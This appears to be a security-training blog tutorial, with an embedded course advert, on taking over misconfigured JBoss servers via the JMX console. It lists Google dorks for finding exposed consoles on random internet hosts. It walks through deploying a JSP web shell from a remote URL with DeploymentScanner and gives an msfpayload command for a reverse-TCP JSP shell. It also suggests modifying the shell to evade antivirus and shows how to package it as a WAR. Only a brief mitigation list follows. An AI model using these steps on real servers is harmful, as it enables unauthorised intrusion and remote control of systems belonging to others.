JBoss Application Server is an open-source Java EE-based application server. JBoss is widely used and is deployed by many organizations on their web servers. There are various vulnerabilities and bugs have been found on JBoss, but today we will have a look at one of the most critical bug in the JBoss application that can be used widely.

If Jboss is not configured properly, it can allow attackers to perform various malicious activities. As the JMX console can be accessed remotely usually on port 8080, hackers and malicious users can deploy their own WAR (web archive) file or shells on the server using the DeploymentScanner function in the JBoss console.

There are few Google dorks for finding the jmx-console and some of them are

  • intitle:”jboss management console” “application server” version inurl:”web-console”
  • intitle:”JBoss Management Console – Server Information” “application server” inurl:”web-console” OR inurl:”jmx-console”
  • inurl:jmx-console/HtmlAdaptor


Since Most of the JBoss server have default authentication to the jmx-console, there is no restriction to access the console and web management interfaces, which allow attackers to bypass authentication and gain administrative access

Now after searching for jmx-console in Google using one of the dork, we choose one of the random URL and we can access the jmx-console. At the same time, there are few servers which do ask for authentication like the image shown below,


Next step, we need a JSP Shell which can be found again in the internet.

To deploy the malicious file, we will use the DeploymentScanner in the jmx console by adding a new URL where our malicious file is uploaded and the addURL() command can be used to add a new URL with an application or shell and it will be fetch the application from specified URL.

The next step is to wait for the DeploymentScanner to deploy the file and then we will be able to access our shell. Before deploying the shell, we need to upload our shell to a site like for example http://www.malicious website.com/files/cmd.jsp. Next we need to deploy it by accessing the DeploymentScanner in the console. Once the URL is added, we will invoke the function.


Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

In the above image, we have a button to invoke the function. Once finished, the application gives a message of successful operation. While using the JSP shells, it’s better to use to metasploit JSP shells since they are more stable when compared to others. To create a jsp shell using metasploit, use the command

root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=8080 R > infosec.jsp

This will generate a jsp shell which can be further modified in order to evade the Anti-virus. Once the shell is uploaded to the server, start the Metasploit multi handler by opening an msfconsole. Access the uploaded shell and you will see a new session in the msfconsole.

If you are planning to upload the jsp shells directly from the console, then you might sometime have to package the malicious jsp file to WAR file. The following instructions should be used to while doing this

  1. Install the most recent Java SDK (may require reboot)
  2. Copy the cmd.jsp to the working directory and make a sub directory named web-inf
  3. Place the content below into the file WEB-INF/web.xml

    <?xml

    version=”1.0″ ?>

    <web-app

    xmlns=”http://java.sun.com/xml/ns/j2ee”

    xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”

    xsi:schemaLocation=”http://java.sun.com/xml/ns/j2ee

    http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd”

    version=”2.4″>

    <servlet>

    <servlet-name>Command</servlet-name>

    <jsp-file>/cmd.jsp</jsp-file>

    </servlet>

    </web-app>

    1. In Windows, pack the files into a WAR with the following command,

      “C:Program Files (x86)Javajdk1.6.0_26binjar.exe” cvf cmd.war WEB-INF cmd.jsp

You can also use this exploit by Kingcope in order to exploit the same.

Mitigation:

  • Upgrade to the latest version of Jboss.
  • To disable the JBoss JMX console and web-console by removing the two .war directory named jmx-console.war and web-console.war from the location $JBOSS_HOME/[server]/all/deploy and $JBOSS_HOME/[server]/default/deploy.
  • Also secure the Apache Tomcat manager

Reference:

https://www.trustwave.com/downloads/spiderlabs/Trustwave-SpiderLabs-Abusing-Jboss-Papathanasiou.pdf